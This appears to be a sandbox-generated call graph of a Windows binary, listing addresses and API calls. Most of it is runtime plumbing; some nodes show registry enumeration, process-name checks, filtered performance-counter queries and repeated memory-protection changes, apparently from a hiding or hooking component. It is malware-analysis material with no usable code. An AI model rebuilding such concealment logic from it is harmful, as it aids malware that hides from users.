_CallSETranslator 9 API calls 7630->7635 7638 26504eaa5b4 7632->7638 7632->7662 7758 26504ea95a4 7632->7758 7634->7632 7637 26504eaa2ea 7635->7637 7639 26504ea9324 _CallSETranslator 9 API calls 7637->7639 7640 26504eaa6d7 7638->7640 7641 26504eaa5ca 7638->7641 7638->7662 7642 26504eaa2f3 7639->7642 7643 26504ea9324 _CallSETranslator 9 API calls 7640->7643 7645 26504eaa5d5 7641->7645 7646 26504ea99cc Is_bad_exception_allowed 9 API calls 7641->7646 7723 26504ea9a0c 7642->7723 7647 26504eaa6dd 7643->7647 7650 26504eab1dc 9 API calls 7645->7650 7646->7645 7649 26504ea9324 _CallSETranslator 9 API calls 7647->7649 7652 26504eaa6e6 7649->7652 7653 26504eaa5eb 7650->7653 7651 26504ea99e0 9 API calls 7651->7667 7655 26504eac2f4 14 API calls 7652->7655 7657 26504ea9634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 7653->7657 7653->7662 7654 26504ea9324 _CallSETranslator 9 API calls 7656 26504eaa335 7654->7656 7655->7621 7656->7623 7659 26504ea9324 _CallSETranslator 9 API calls 7656->7659 7658 26504eaa605 7657->7658 7762 26504ea9838 RtlUnwindEx 7658->7762 7661 26504eaa341 7659->7661 7663 26504ea9324 _CallSETranslator 9 API calls 7661->7663 7662->7624 7665 26504eaa34a 7663->7665 7726 26504eab1dc 7665->7726 7667->7627 7667->7651 7737 26504eaa96c 7667->7737 7751 26504eaa158 7667->7751 7670 26504eaa35e 7733 26504eab2cc 7670->7733 7672 26504eaa6d1 7791 26504eac2f4 7672->7791 7674 26504eaa366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 7674->7672 7786 26504ea9178 7674->7786 7677 26504ea935f GetLastError 7676->7677 7678 26504ea9358 7676->7678 7688 26504ea9c8c 7677->7688 7678->7593 7692 26504ea9aac 7688->7692 7698 26504ea9b96 TlsGetValue 7692->7698 7699 26504ea9af0 __vcrt_InitializeCriticalSectionEx 7692->7699 7693 26504ea9b1e LoadLibraryExW 7695 26504ea9b3f GetLastError 7693->7695 7696 26504ea9bbd 7693->7696 7694 26504ea9bdd GetProcAddress 7694->7698 7695->7699 7696->7694 7697 26504ea9bd4 FreeLibrary 7696->7697 7697->7694 7699->7693 7699->7694 7699->7698 7700 26504ea9b61 LoadLibraryExW 7699->7700 7700->7696 7700->7699 7702 26504ea9324 _CallSETranslator 9 API calls 7701->7702 7703 26504ea9a02 7702->7703 7703->7601 7707 26504ea9662 __FrameHandler3::FrameUnwindToEmptyState 7704->7707 7705 26504ea96d4 7705->7608 7706 26504ea968c RtlLookupFunctionEntry 7706->7707 7707->7705 7707->7706 7709 26504ea958b 7708->7709 7711 26504ea9560 7708->7711 7709->7611 7710 26504ea9324 _CallSETranslator 9 API calls 7710->7711 7711->7709 7711->7710 7713 26504eab169 __FrameHandler3::FrameUnwindToEmptyState 7712->7713 7714 26504ea9634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 7713->7714 7715 26504eab17e 7714->7715 7794 26504ea9db4 7715->7794 7718 26504eab190 __FrameHandler3::GetHandlerSearchState 7797 26504ea9dec 7718->7797 7719 26504eab1b3 7720 26504ea9db4 __GetUnwindTryBlock RtlLookupFunctionEntry 7719->7720 7721 26504eaa28e 7720->7721 7721->7621 7721->7623 7721->7628 7724 26504ea9324 _CallSETranslator 9 API calls 7723->7724 7725 26504ea9a1a 7724->7725 7725->7621 7725->7654 7727 26504eab2c3 7726->7727 7732 26504eab207 7726->7732 7728 26504eaa35a 7728->7623 7728->7670 7729 26504ea99e0 9 API calls 7729->7732 7730 26504ea99cc Is_bad_exception_allowed 9 API calls 7730->7732 7731 26504eaa96c 9 API calls 7731->7732 7732->7728 7732->7729 7732->7730 7732->7731 7735 26504eab2e9 Is_bad_exception_allowed 7733->7735 7736 26504eab339 7733->7736 7734 26504ea99cc 9 API calls Is_bad_exception_allowed 7734->7735 7735->7734 7735->7736 7736->7674 7738 26504eaa999 7737->7738 7749 26504eaaa28 7737->7749 7739 26504ea99cc Is_bad_exception_allowed 9 API calls 7738->7739 7740 26504eaa9a2 7739->7740 7741 26504ea99cc Is_bad_exception_allowed 9 API calls 7740->7741 7742 26504eaa9bb 7740->7742 7740->7749 7741->7742 7743 26504eaa9e7 7742->7743 7744 26504ea99cc Is_bad_exception_allowed 9 API calls 7742->7744 7742->7749 7745 26504ea99e0 9 API calls 7743->7745 7744->7743 7746 26504eaa9fb 7745->7746 7747 26504eaaa14 7746->7747 7748 26504ea99cc Is_bad_exception_allowed 9 API calls 7746->7748 7746->7749 7750 26504ea99e0 9 API calls 7747->7750 7748->7747 7749->7667 7750->7749 7752 26504ea9634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 7751->7752 7753 26504eaa195 7752->7753 7754 26504ea99cc Is_bad_exception_allowed 9 API calls 7753->7754 7755 26504eaa1cd 7754->7755 7756 26504ea9838 9 API calls 7755->7756 7757 26504eaa211 7756->7757 7757->7667 7759 26504ea95b8 __FrameHandler3::FrameUnwindToEmptyState 7758->7759 7760 26504ea9540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 7759->7760 7761 26504ea95c2 7760->7761 7761->7638 7763 26504ea8070 _invalid_parameter_noinfo 8 API calls 7762->7763 7764 26504ea9932 7763->7764 7764->7662 7766 26504eaa735 7765->7766 7771 26504eaa948 7765->7771 7767 26504ea9324 _CallSETranslator 9 API calls 7766->7767 7768 26504eaa73a 7767->7768 7769 26504eaa759 EncodePointer 7768->7769 7775 26504eaa7ac 7768->7775 7770 26504ea9324 _CallSETranslator 9 API calls 7769->7770 7772 26504eaa769 7770->7772 7771->7662 7772->7775 7800 26504ea94ec 7772->7800 7774 26504ea99cc 9 API calls Is_bad_exception_allowed 7774->7775 7775->7771 7775->7774 7776 26504eaa158 19 API calls 7775->7776 7776->7775 7778 26504ea8079 7777->7778 7779 26504ea8084 7778->7779 7780 26504ea8848 IsProcessorFeaturePresent 7778->7780 7779->7588 7781 26504ea8860 7780->7781 7803 26504ea891c RtlCaptureContext 7781->7803 7787 26504ea9197 7786->7787 7788 26504ea91c0 RtlPcToFileHeader 7787->7788 7789 26504ea91e2 RaiseException 7787->7789 7790 26504ea91d8 7788->7790 7789->7672 7790->7789 7808 26504eacab0 7791->7808 7793 26504eac2fd 7795 26504ea9634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 7794->7795 7796 26504ea9dc7 7795->7796 7796->7718 7796->7719 7798 26504ea9634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 7797->7798 7799 26504ea9e06 7798->7799 7799->7721 7801 26504ea9324 _CallSETranslator 9 API calls 7800->7801 7802 26504ea9518 7801->7802 7802->7775 7804 26504ea8936 RtlLookupFunctionEntry 7803->7804 7805 26504ea8873 7804->7805 7806 26504ea894c RtlVirtualUnwind 7804->7806 7807 26504ea8814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7805->7807 7806->7804 7806->7805 7816 26504eacb10 7808->7816 7810 26504eacabe 7810->7793 7811 26504eacab9 7811->7810 7812 26504eacae4 7811->7812 7813 26504eacae8 FlsGetValue 7811->7813 7815 26504eacafe 7812->7815 7825 26504eac940 GetLastError 7812->7825 7813->7812 7815->7793 7817 26504eacb59 GetLastError 7816->7817 7822 26504eacb2f __std_exception_copy 7816->7822 7818 26504eacb6c 7817->7818 7819 26504eacb8a SetLastError 7818->7819 7821 26504eacb87 7818->7821 7823 26504eac940 _invalid_parameter_noinfo 11 API calls 7818->7823 7820 26504eacb54 7819->7820 7820->7811 7821->7819 7822->7820 7824 26504eac940 _invalid_parameter_noinfo 11 API calls 7822->7824 7823->7821 7824->7820 7826 26504eac966 7825->7826 7827 26504eac96c SetLastError 7826->7827 7843 26504ead220 7826->7843 7828 26504eac9e5 7827->7828 7828->7815 7831 26504eac9a5 FlsSetValue 7834 26504eac9b1 FlsSetValue 7831->7834 7835 26504eac9c8 7831->7835 7832 26504eac995 FlsSetValue 7850 26504ead2a0 7832->7850 7837 26504ead2a0 __free_lconv_mon 7 API calls 7834->7837 7856 26504eac758 7835->7856 7839 26504eac9c6 SetLastError 7837->7839 7839->7828 7848 26504ead231 _invalid_parameter_noinfo 7843->7848 7844 26504ead282 7864 26504ead1f4 7844->7864 7845 26504ead266 HeapAlloc 7846 26504eac987 7845->7846 7845->7848 7846->7831 7846->7832 7848->7844 7848->7845 7861 26504eab470 7848->7861 7851 26504ead2a5 HeapFree 7850->7851 7852 26504eac9a3 7850->7852 7851->7852 7853 26504ead2c0 GetLastError 7851->7853 7852->7827 7854 26504ead2cd __free_lconv_mon 7853->7854 7855 26504ead1f4 __std_exception_copy 11 API calls 7854->7855 7855->7852 7873 26504eac630 7856->7873 7867 26504eab4c0 7861->7867 7865 26504eacb10 __std_exception_copy 13 API calls 7864->7865 7866 26504ead1fd 7865->7866 7866->7846 7872 26504eac558 EnterCriticalSection 7867->7872 7885 26504eac558 EnterCriticalSection 7873->7885 8494 26504eaf440 GetProcessHeap 9200 26504eaff40 9201 26504eaff4b 9200->9201 9209 26504eb2c24 9201->9209 9222 26504eac558 EnterCriticalSection 9209->9222 8883 26504ea81c0 8884 26504ea81c9 __scrt_acquire_startup_lock 8883->8884 8886 26504ea81cd 8884->8886 8887 26504eabbb4 8884->8887 8888 26504eabbed 8887->8888 8889 26504eabbd4 8887->8889 8888->8886 8890 26504eabbf2 8889->8890 8891 26504eabbdc 8889->8891 8893 26504eae864 56 API calls 8890->8893 8892 26504ead1f4 __std_exception_copy 13 API calls 8891->8892 8894 26504eabbe1 8892->8894 8895 26504eabbf7 8893->8895 8896 26504ead04c _invalid_parameter_noinfo 38 API calls 8894->8896 8916 26504eadf38 GetModuleFileNameW 8895->8916 8896->8888 8901 26504eabb54 13 API calls 8902 26504eabc61 8901->8902 8903 26504eabc7a 8902->8903 8904 26504eabc69 8902->8904 8906 26504eab994 14 API calls 8903->8906 8905 26504ead1f4 __std_exception_copy 13 API calls 8904->8905 8915 26504eabc6e 8905->8915 8908 26504eabc96 8906->8908 8907 26504ead2a0 __free_lconv_mon 13 API calls 8907->8888 8909 26504eabcdf 8908->8909 8910 26504eabcc6 8908->8910 8908->8915 8912 26504ead2a0 __free_lconv_mon 13 API calls 8909->8912 8911 26504ead2a0 __free_lconv_mon 13 API calls 8910->8911 8913 26504eabccf 8911->8913 8912->8915 8914 26504ead2a0 __free_lconv_mon 13 API calls 8913->8914 8914->8888 8915->8907 8917 26504eadf7d GetLastError 8916->8917 8918 26504eadf91 8916->8918 8934 26504ead184 8917->8934 8920 26504eadd78 14 API calls 8918->8920 8922 26504eadfbf 8920->8922 8921 26504eadf8a 8923 26504ea8070 _invalid_parameter_noinfo 8 API calls 8921->8923 8924 26504eaf198 9 API calls 8922->8924 8927 26504eadfd0 8922->8927 8926 26504eabc0e 8923->8926 8924->8927 8928 26504eab994 8926->8928 8939 26504eade1c 8927->8939 8930 26504eab9d2 8928->8930 8932 26504eaba38 8930->8932 8956 26504eaec1c 8930->8956 8931 26504eabb25 8931->8901 8932->8931 8933 26504eaec1c 14 API calls 8932->8933 8933->8932 8953 26504ead1d0 8934->8953 8936 26504ead191 __free_lconv_mon 8937 26504ead1f4 __std_exception_copy 13 API calls 8936->8937 8938 26504ead1a1 8937->8938 8938->8921 8940 26504eade5b 8939->8940 8941 26504eade40 8939->8941 8942 26504eaece8 WideCharToMultiByte 8940->8942 8946 26504eade60 8940->8946 8941->8921 8943 26504eadeb7 8942->8943 8945 26504eadebe GetLastError 8943->8945 8943->8946 8947 26504eadee9 8943->8947 8944 26504ead1f4 __std_exception_copy 13 API calls 8944->8941 8948 26504ead184 13 API calls 8945->8948 8946->8941 8946->8944 8949 26504eaece8 WideCharToMultiByte 8947->8949 8950 26504eadecb 8948->8950 8951 26504eadf10 8949->8951 8952 26504ead1f4 __std_exception_copy 13 API calls 8950->8952 8951->8941 8951->8945 8952->8941 8954 26504eacb10 __std_exception_copy 13 API calls 8953->8954 8955 26504ead1d9 8954->8955 8955->8936 8957 26504eaeba8 8956->8957 8958 26504eadd78 14 API calls 8957->8958 8959 26504eaebcc 8958->8959 8959->8930 7455 26504ea1bc4 7462 26504ea1724 GetProcessHeap HeapAlloc 7455->7462 7457 26504ea1bd3 7458 26504ea1bda SleepEx 7457->7458 7461 26504ea159c StrCmpIW StrCmpW 7457->7461 7513 26504ea19b0 7457->7513 7459 26504ea1724 50 API calls 7458->7459 7459->7457 7461->7457 7530 26504ea1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7462->7530 7464 26504ea174c 7531 26504ea1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7464->7531 7466 26504ea1754 7532 26504ea1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7466->7532 7468 26504ea175d 7533 26504ea1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7468->7533 7470 26504ea1766 7534 26504ea1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7470->7534 7472 26504ea176f 7535 26504ea1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7472->7535 7474 26504ea1778 7536 26504ea1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7474->7536 7476 26504ea1781 7537 26504ea1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7476->7537 7478 26504ea178a RegOpenKeyExW 7479 26504ea19a2 7478->7479 7480 26504ea17bc RegOpenKeyExW 7478->7480 7479->7457 7481 26504ea17e5 7480->7481 7482 26504ea17fb RegOpenKeyExW 7480->7482 7538 26504ea12b8 RegQueryInfoKeyW 7481->7538 7483 26504ea181f 7482->7483 7484 26504ea1836 RegOpenKeyExW 7482->7484 7547 26504ea104c RegQueryInfoKeyW 7483->7547 7487 26504ea1871 RegOpenKeyExW 7484->7487 7488 26504ea185a 7484->7488 7492 26504ea1895 7487->7492 7493 26504ea18ac RegOpenKeyExW 7487->7493 7491 26504ea12b8 16 API calls 7488->7491 7494 26504ea1867 RegCloseKey 7491->7494 7495 26504ea12b8 16 API calls 7492->7495 7496 26504ea18d0 7493->7496 7497 26504ea18e7 RegOpenKeyExW 7493->7497 7494->7487 7500 26504ea18a2 RegCloseKey 7495->7500 7501 26504ea12b8 16 API calls 7496->7501 7498 26504ea1922 RegOpenKeyExW 7497->7498 7499 26504ea190b 7497->7499 7503 26504ea195d RegOpenKeyExW 7498->7503 7504 26504ea1946 7498->7504 7502 26504ea104c 6 API calls 7499->7502 7500->7493 7505 26504ea18dd RegCloseKey 7501->7505 7506 26504ea1918 RegCloseKey 7502->7506 7508 26504ea1981 7503->7508 7509 26504ea1998 RegCloseKey 7503->7509 7507 26504ea104c 6 API calls 7504->7507 7505->7497 7506->7498 7510 26504ea1953 RegCloseKey 7507->7510 7511 26504ea104c 6 API calls 7508->7511 7509->7479 7510->7503 7512 26504ea198e RegCloseKey 7511->7512 7512->7509 7557 26504ea14a0 7513->7557 7530->7464 7531->7466 7532->7468 7533->7470 7534->7472 7535->7474 7536->7476 7537->7478 7539 26504ea1323 GetProcessHeap HeapAlloc 7538->7539 7540 26504ea1486 RegCloseKey 7538->7540 7541 26504ea134e RegEnumValueW 7539->7541 7542 26504ea1472 GetProcessHeap HeapFree 7539->7542 7540->7482 7544 26504ea13a1 7541->7544 7542->7540 7544->7541 7544->7542 7545 26504ea13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7544->7545 7546 26504ea141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7544->7546 7552 26504ea1530 7544->7552 7545->7546 7546->7544 7548 26504ea11b5 RegCloseKey 7547->7548 7550 26504ea10bf 7547->7550 7548->7484 7549 26504ea10cf RegEnumValueW 7549->7550 7550->7548 7550->7549 7551 26504ea114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7550->7551 7551->7550 7553 26504ea154a 7552->7553 7554 26504ea1580 7552->7554 7553->7554 7555 26504ea1561 StrCmpIW 7553->7555 7556 26504ea1569 StrCmpW 7553->7556 7554->7544 7555->7553 7556->7553 7558 26504ea14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7557->7558 7559 26504ea14c2 GetProcessHeap HeapFree 7557->7559 7559->7558 7559->7559 8960 26504eb47c2 8961 26504ea9978 __CxxCallCatchBlock 9 API calls 8960->8961 8964 26504eb47d5 8961->8964 8962 26504ea9324 _CallSETranslator 9 API calls 8963 26504eb4828 8962->8963 8965 26504ea9324 _CallSETranslator 9 API calls 8963->8965 8966 26504ea8ff8 __CxxCallCatchBlock 9 API calls 8964->8966 8968 26504eb4814 __CxxCallCatchBlock 8964->8968 8967 26504eb4838 8965->8967 8966->8968 8968->8962 8495 26504eaae42 8496 26504ea9324 _CallSETranslator 9 API calls 8495->8496 8498 26504eaae4f __CxxCallCatchBlock 8496->8498 8497 26504eaae93 RaiseException 8499 26504eaaeba 8497->8499 8498->8497 8508 26504ea9978 8499->8508 8501 26504eaaeeb __CxxCallCatchBlock 8502 26504ea9324 _CallSETranslator 9 API calls 8501->8502 8503 26504eaaefe 8502->8503 8505 26504ea9324 _CallSETranslator 9 API calls 8503->8505 8507 26504eaaf07 8505->8507 8509 26504ea9324 _CallSETranslator 9 API calls 8508->8509 8510 26504ea998a 8509->8510 8511 26504ea9324 _CallSETranslator 9 API calls 8510->8511 8512 26504ea99c5 8510->8512 8513 26504ea9995 8511->8513 8513->8512 8514 26504ea9324 _CallSETranslator 9 API calls 8513->8514 8515 26504ea99b6 8514->8515 8515->8501 8516 26504ea8ff8 8515->8516 8517 26504ea9324 _CallSETranslator 9 API calls 8516->8517 8518 26504ea9006 8517->8518 8518->8501 7887 26504ea34b8 7888 26504ea34e8 7887->7888 7889 26504ea35a1 7888->7889 7890 26504ea3505 PdhGetCounterInfoW 7888->7890 7890->7889 7891 26504ea3523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 7890->7891 7892 26504ea358d GetProcessHeap HeapFree 7891->7892 7893 26504ea3555 StrCmpW 7891->7893 7892->7889 7893->7892 7895 26504ea356a 7893->7895 7895->7892 7896 26504ea3950 StrCmpNW 7895->7896 7897 26504ea39f2 7896->7897 7898 26504ea3982 StrStrW 7896->7898 7897->7895 7898->7897 7899 26504ea399b StrToIntW 7898->7899 7899->7897 7900 26504ea39c3 7899->7900 7900->7897 7906 26504ea1a30 OpenProcess 7900->7906 7903 26504ea3f88 StrCmpNIW 7904 26504ea39e4 7903->7904 7904->7897 7912 26504ea1cfc 7904->7912 7907 26504ea1a64 K32GetModuleFileNameExW 7906->7907 7908 26504ea1ab6 7906->7908 7909 26504ea1aad CloseHandle 7907->7909 7910 26504ea1a7e PathFindFileNameW lstrlenW 7907->7910 7908->7897 7908->7903 7909->7908 7910->7909 7911 26504ea1a9c StrCpyW 7910->7911 7911->7909 7913 26504ea1d13 7912->7913 7914 26504ea1d1c 7912->7914 7915 26504ea1530 2 API calls 7913->7915 7914->7897 7915->7914 7560 26504ea1e3c LoadLibraryA GetProcAddress 7561 26504ea1e6f 7560->7561 7562 26504ea1e62 SleepEx 7560->7562 7562->7562 9223 26504eac510 9224 26504eac518 9223->9224 9226 26504eac545 9224->9226 9227 26504eac574 9224->9227 9228 26504eac59f 9227->9228 9229 26504eac5a3 9228->9229 9230 26504eac582 DeleteCriticalSection 9228->9230 9229->9226 9230->9228 7916 26504ea5c8d 7918 26504ea5c94 7916->7918 7917 26504ea5cfb 7918->7917 7919 26504ea5d77 VirtualProtect 7918->7919 7920 26504ea5da3 GetLastError 7919->7920 7921 26504ea5db1 7919->7921 7920->7921 8519 26504eb4611 __scrt_dllmain_exception_filter 8520 26504ea820c 8527 26504ea8f34 8520->8527 8523 26504ea8219 8528 26504ea9340 _CallSETranslator 9 API calls 8527->8528 8529 26504ea8215 8528->8529 8529->8523 8530 26504eac288 8529->8530 8531 26504eacb10 __std_exception_copy 13 API calls 8530->8531 8532 26504ea8222 8531->8532 8532->8523 8533 26504ea8f48 8532->8533 8536 26504ea92dc 8533->8536 8535 26504ea8f51 8535->8523 8537 26504ea92ed 8536->8537 8541 26504ea9302 8536->8541 8538 26504ea9c8c _CallSETranslator 6 API calls 8537->8538 8539 26504ea92f2 8538->8539 8542 26504ea9cd4 8539->8542 8541->8535 8543 26504ea9aac __vcrt_InitializeCriticalSectionEx 5 API calls 8542->8543 8544 26504ea9d02 8543->8544 8545 26504ea9d14 TlsSetValue 8544->8545 8546 26504ea9d0c 8544->8546 8545->8546 8546->8541 9231 26504ea8f0c 9238 26504ea946c 9231->9238 9236 26504ea8f19 9240 26504ea9474 9238->9240 9241 26504ea94a5 9240->9241 9242 26504ea8f15 9240->9242 9255 26504ea9d28 9240->9255 9243 26504ea94b4 __vcrt_uninitialize_locks DeleteCriticalSection 9241->9243 9242->9236 9244 26504ea9400 9242->9244 9243->9242 9260 26504ea9bfc 9244->9260 9256 26504ea9aac __vcrt_InitializeCriticalSectionEx 5 API calls 9255->9256 9257 26504ea9d5e 9256->9257 9258 26504ea9d73 InitializeCriticalSectionAndSpinCount 9257->9258 9259 26504ea9d68 9257->9259 9258->9259 9259->9240 9261 26504ea9aac __vcrt_InitializeCriticalSectionEx 5 API calls 9260->9261 9262 26504ea9c21 TlsAlloc 9261->9262 8547 26504eafe20 8548 26504eafe4a 8547->8548 8549 26504ead220 _invalid_parameter_noinfo 13 API calls 8548->8549 8550 26504eafe6a 8549->8550 8551 26504ead2a0 __free_lconv_mon 13 API calls 8550->8551 8552 26504eafe78 8551->8552 8553 26504eafea2 8552->8553 8555 26504ead220 _invalid_parameter_noinfo 13 API calls 8552->8555 8554 26504eafec1 InitializeCriticalSectionEx 8553->8554 8557 26504eafeab 8553->8557 8554->8553 8556 26504eafe94 8555->8556 8558 26504ead2a0 __free_lconv_mon 13 API calls 8556->8558 8558->8553 8559 26504eaf820 8562 26504eaf7d8 8559->8562 8567 26504eac558 EnterCriticalSection 8562->8567 9264 26504ea4320 9267 26504ea426d 9264->9267 9265 26504ea42d7 9266 26504ea42bd VirtualQuery 9266->9265 9266->9267 9267->9265 9267->9266 9268 26504ea4322 GetLastError 9267->9268 9268->9265 9268->9267 8969 26504eb479d 8972 26504eaaf34 8969->8972 8973 26504eaaf4e 8972->8973 8975 26504eaaf9b 8972->8975 8974 26504ea9324 _CallSETranslator 9 API calls 8973->8974 8973->8975 8974->8975 8568 26504eac218 8569 26504ead2a0 __free_lconv_mon 13 API calls 8568->8569 8570 26504eac228 8569->8570 8571 26504ead2a0 __free_lconv_mon 13 API calls 8570->8571 8572 26504eac23c 8571->8572 8573 26504ead2a0 __free_lconv_mon 13 API calls 8572->8573 8574 26504eac250 8573->8574 8575 26504ead2a0 __free_lconv_mon 13 API calls 8574->8575 8576 26504eac264 8575->8576 8976 26504eb1398 8977 26504eb13ae 8976->8977 8978 26504eb13f5 8977->8978 8980 26504eb140e 8977->8980 8979 26504ead1f4 __std_exception_copy 13 API calls 8978->8979 8981 26504eb13fa 8979->8981 8983 26504eadd78 14 API calls 8980->8983 8984 26504eb1405 8980->8984 8982 26504ead04c _invalid_parameter_noinfo 38 API calls 8981->8982 8982->8984 8983->8984 9269 26504ea2518 GetProcessIdOfThread GetCurrentProcessId 9270 26504ea25be 9269->9270 9271 26504ea2543 CreateFileW 9269->9271 9271->9270 9272 26504ea2577 WriteFile ReadFile CloseHandle 9271->9272 9272->9270 7945 26504eaf870 7946 26504eaf8a0 7945->7946 7948 26504eaf8c7 7945->7948 7947 26504eacb10 __std_exception_copy 13 API calls 7946->7947 7946->7948 7953 26504eaf8b4 7946->7953 7947->7953 7949 26504eaf99c 7948->7949 7971 26504eac558 EnterCriticalSection 7948->7971 7952 26504eafab3 7949->7952 7954 26504eafa03 7949->7954 7961 26504eaf9ca 7949->7961 7950 26504eaf904 7955 26504eafac0 7952->7955 7973 26504eac5ac LeaveCriticalSection 7952->7973 7953->7948 7953->7950 7956 26504eaf949 7953->7956 7965 26504eafa61 7954->7965 7972 26504eac5ac LeaveCriticalSection 7954->7972 7957 26504ead1f4 __std_exception_copy 13 API calls 7956->7957 7960 26504eaf94e 7957->7960 7968 26504ead04c 7960->7968 7961->7954 7963 26504eacab0 _invalid_parameter_noinfo 14 API calls 7961->7963 7964 26504eaf9f3 7963->7964 7966 26504eacab0 _invalid_parameter_noinfo 14 API calls 7964->7966 7967 26504eacab0 14 API calls _invalid_parameter_noinfo 7965->7967 7966->7954 7967->7965 7974 26504eacef8 7968->7974 7975 26504eacf23 7974->7975 7982 26504eacf94 7975->7982 7977 26504eacf4a 7978 26504eacf6d 7977->7978 7992 26504eac3e0 7977->7992 7980 26504eacf82 7978->7980 7981 26504eac3e0 _invalid_parameter_noinfo 17 API calls 7978->7981 7980->7950 7981->7980 8005 26504eaccc8 7982->8005 7986 26504eacfcf 7986->7977 7993 26504eac3ef GetLastError 7992->7993 7994 26504eac438 7992->7994 7995 26504eac404 7993->7995 7994->7978 7996 26504eacba0 _invalid_parameter_noinfo 14 API calls 7995->7996 7997 26504eac41e SetLastError 7996->7997 7997->7994 7998 26504eac441 7997->7998 7999 26504eac3e0 _invalid_parameter_noinfo 15 API calls 7998->7999 8000 26504eac467 7999->8000 8031 26504eaffe8 8000->8031 8006 26504eacd1f 8005->8006 8007 26504eacce4 GetLastError 8005->8007 8006->7986 8011 26504eacd34 8006->8011 8008 26504eaccf4 8007->8008 8018 26504eacba0 8008->8018 8012 26504eacd50 GetLastError SetLastError 8011->8012 8013 26504eacd68 8011->8013 8012->8013 8013->7986 8014 26504ead06c IsProcessorFeaturePresent 8013->8014 8015 26504ead07f 8014->8015 8023 26504eacd80 8015->8023 8019 26504eacbc8 FlsGetValue 8018->8019 8021 26504eacbc4 8018->8021 8019->8021 8020 26504eacbde SetLastError 8020->8006 8021->8020 8022 26504eac940 _invalid_parameter_noinfo 13 API calls 8021->8022 8022->8020 8024 26504eacdba _invalid_parameter_noinfo 8023->8024 8025 26504eacde2 RtlCaptureContext RtlLookupFunctionEntry 8024->8025 8026 26504eace2e RtlVirtualUnwind 8025->8026 8027 26504eace64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8025->8027 8026->8027 8028 26504eaceb6 _invalid_parameter_noinfo 8027->8028 8029 26504ea8070 _invalid_parameter_noinfo 8 API calls 8028->8029 8030 26504eaced5 GetCurrentProcess TerminateProcess 8029->8030 8032 26504eb0001 8031->8032 8033 26504eac48f 8031->8033 8032->8033 8039 26504eb0a40 8032->8039 8035 26504eb0054 8033->8035 8036 26504eb006d 8035->8036 8037 26504eac49f 8035->8037 8036->8037 8049 26504eae8c4 8036->8049 8037->7978 8040 26504eacab0 _invalid_parameter_noinfo 14 API calls 8039->8040 8041 26504eb0a4f 8040->8041 8047 26504eb0a95 8041->8047 8048 26504eac558 EnterCriticalSection 8041->8048 8047->8033 8050 26504eacab0 _invalid_parameter_noinfo 14 API calls 8049->8050 8051 26504eae8cd 8050->8051 8985 26504eaf370 VirtualProtect 8577 26504ea2ff0 8578 26504ea3061 8577->8578 8579 26504ea3384 8578->8579 8580 26504ea308d GetModuleHandleA 8578->8580 8581 26504ea309f GetProcAddress 8580->8581 8582 26504ea30b1 8580->8582 8581->8582 8582->8579 8583 26504ea30d8 StrCmpNIW 8582->8583 8583->8579 8589 26504ea30fd 8583->8589 8584 26504ea1a30 6 API calls 8584->8589 8585 26504ea32b9 lstrlenW 8585->8589 8586 26504ea320f lstrlenW 8586->8589 8587 26504ea1cfc StrCmpIW StrCmpW 8587->8589 8588 26504ea3f88 StrCmpNIW 8588->8589 8589->8579 8589->8584 8589->8585 8589->8586 8589->8587 8589->8588 8986 26504ea5974 8987 26504ea597a 8986->8987 8998 26504ea7fa0 8987->8998 8991 26504ea59de 8993 26504ea5a77 8993->8991 8994 26504ea5bfd 8993->8994 9011 26504ea7b80 8993->9011 8995 26504ea5cfb 8994->8995 8996 26504ea5d77 VirtualProtect 8994->8996 8996->8991 8997 26504ea5da3 GetLastError 8996->8997 8997->8991 9001 26504ea7fab 8998->9001 8999 26504ea59bd 8999->8991 9007 26504ea4400 8999->9007 9000 26504eab470 _invalid_parameter_noinfo 2 API calls 9000->9001 9001->8999 9001->9000 9002 26504ea7fca 9001->9002 9003 26504ea7fd5 9002->9003 9017 26504ea87b8 9002->9017 9021 26504ea87d8 9003->9021 9008 26504ea441d 9007->9008 9010 26504ea448c 9008->9010 9025 26504ea4670 9008->9025 9010->8993 9012 26504ea7bc7 9011->9012 9050 26504ea7950 9012->9050 9015 26504ea8070 _invalid_parameter_noinfo 8 API calls 9016 26504ea7bf1 9015->9016 9016->8993 9018 26504ea87c6 std::bad_alloc::bad_alloc 9017->9018 9019 26504ea9178 Concurrency::cancel_current_task 2 API calls 9018->9019 9020 26504ea87d7 9019->9020 9022 26504ea87e6 std::bad_alloc::bad_alloc 9021->9022 9023 26504ea9178 Concurrency::cancel_current_task 2 API calls 9022->9023 9024 26504ea7fdb 9023->9024 9026 26504ea4694 9025->9026 9027 26504ea46b7 9025->9027 9026->9027 9039 26504ea4120 9026->9039 9028 26504ea46ed 9027->9028 9045 26504ea4250 9027->9045 9031 26504ea4250 2 API calls 9028->9031 9036 26504ea471d 9028->9036 9031->9036 9032 26504ea4753 9033 26504ea476f 9032->9033 9034 26504ea4120 3 API calls 9032->9034 9035 26504ea478b 9033->9035 9038 26504ea4250 2 API calls 9033->9038 9034->9033 9035->9010 9036->9032 9037 26504ea4120 3 API calls 9036->9037 9037->9032 9038->9035 9044 26504ea4141 9039->9044 9040 26504ea41b0 9040->9027 9041 26504ea4196 VirtualQuery 9041->9040 9041->9044 9042 26504ea41ca VirtualAlloc 9042->9040 9043 26504ea41fb GetLastError 